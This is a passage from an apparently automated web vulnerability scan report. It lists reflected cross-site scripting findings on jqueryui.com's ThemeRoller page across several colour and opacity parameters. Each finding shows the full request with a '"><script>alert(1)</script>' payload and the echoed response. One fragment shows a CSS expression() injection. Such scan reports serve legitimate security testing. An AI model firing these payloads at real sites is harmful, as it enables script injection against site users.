<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a href="/gf/snippet/?action=&amp;2ed9f"style="x:expression(alert(1))"8d782a550bf=1&amp;_trove_category_id=13">
...[SNIP]...

4.140. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae11"><script>alert(1)</script>ebc3646c0ab was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9eae11"><script>alert(1)</script>ebc3646c0ab&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9eae11"><script>alert(1)</script>ebc3646c0ab&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

4.141. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df530"><script>alert(1)</script>25601c79a2e was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfddf530"><script>alert(1)</script>25601c79a2e&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfddf530"><script>alert(1)</script>25601c79a2e&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85
...[SNIP]...

4.142. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10283"><script>alert(1)</script>d2b773a3e6 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc10283"><script>alert(1)</script>d2b773a3e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc10283"><script>alert(1)</script>d2b773a3e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

4.143. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d2f"><script>alert(1)</script>fe81736995b was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc33d2f"><script>alert(1)</script>fe81736995b&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc33d2f"><script>alert(1)</script>fe81736995b&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

4.144. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a2b"><script>alert(1)</script>aac3cc6fe96 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5e4a2b"><script>alert(1)</script>aac3cc6fe96&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5e4a2b"><script>alert(1)</script>aac3cc6fe96&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorA
...[SNIP]...

4.145. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9449b"><script>alert(1)</script>86f3b7ecaa6 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1009449b"><script>alert(1)</script>86f3b7ecaa6&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1009449b"><script>alert(1)</script>86f3b7ecaa6&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefaul
...[SNIP]...

4.146. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea547"><script>alert(1)</script>44c9f70b60c was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85ea547"><script>alert(1)</script>44c9f70b60c&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85ea547"><script>alert(1)</script>44c9f70b60c&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgC
...[SNIP]...

4.147. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9719"><script>alert(1)</script>dd196012e00 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55d9719"><script>alert(1)</script>dd196012e00&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55d9719"><script>alert(1)</script>dd196012e00&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorCon
...[SNIP]...

4.148. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d312"><script>alert(1)</script>7ccc9c6c514 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=754d312"><script>alert(1)</script>7ccc9c6c514&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
